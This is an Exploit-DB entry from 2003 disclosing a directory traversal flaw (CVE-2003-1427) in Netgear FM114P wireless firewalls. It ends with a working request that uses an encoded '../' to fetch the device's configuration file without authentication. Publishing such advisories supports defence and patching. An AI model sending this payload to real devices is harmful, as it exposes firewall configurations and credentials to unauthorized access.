Netgear FM114P Wireless Firewall File Disclosure Vulnerability

2003-02-10T00:00:00
ID EDB-ID:22236
Type exploitdb
Reporter stickler
Modified 2003-02-10T00:00:00

Description

Netgear FM114P Wireless Firewall File Disclosure Vulnerability. CVE-2003-1427. Remote exploit for hardware platform

                                        
                                            source: http://www.securityfocus.com/bid/6807/info

Netgear FM114P Wireless Firewalls allow directory traversal using escaped character sequences. It is possible for an unauthenticated user to retrieve the firewall's configuration file by escaping from the /upnp/service directory.

http://<ip-or-hostname>:<port>/upnp/service/%2e%2e%2fnetgear.cfg